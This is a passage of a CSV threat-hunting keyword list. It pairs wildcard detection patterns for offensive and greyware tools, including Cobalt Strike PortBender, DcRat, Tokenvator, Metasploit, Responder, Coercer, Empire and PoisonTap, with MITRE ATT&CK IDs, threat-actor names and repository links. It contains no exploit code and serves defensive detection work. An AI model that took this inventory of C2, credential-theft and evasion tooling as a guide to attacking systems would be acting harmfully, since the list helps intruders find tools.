- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plugins.nessus.org.*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Plugins\AccessTokens\TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\AccessTokens\TokenManipulation*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\Execution\PSExec*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*plummm/CVE-2022-27666*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"*pm3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*poc.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*poc.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*POC_DLL.dll*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*POC1*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*POC2*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*poeojclicodamonabcabmapamjkkmnnk*","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*poetry run bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6027","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" +"*polenum *-protocols *","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*polenum -h*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*pooljnboifbodgifngpppfklhifechoe*","greyware_tool_keyword","GeoProxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*poor buffer accounting in str_netfd_alloc*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*port and pasv both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*port_forward_pivot.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*port_scanner_regex.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*PortBender backdoor*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender redirect*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.cna*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.cpp*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*portbender.dll*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.exe*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.h*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - 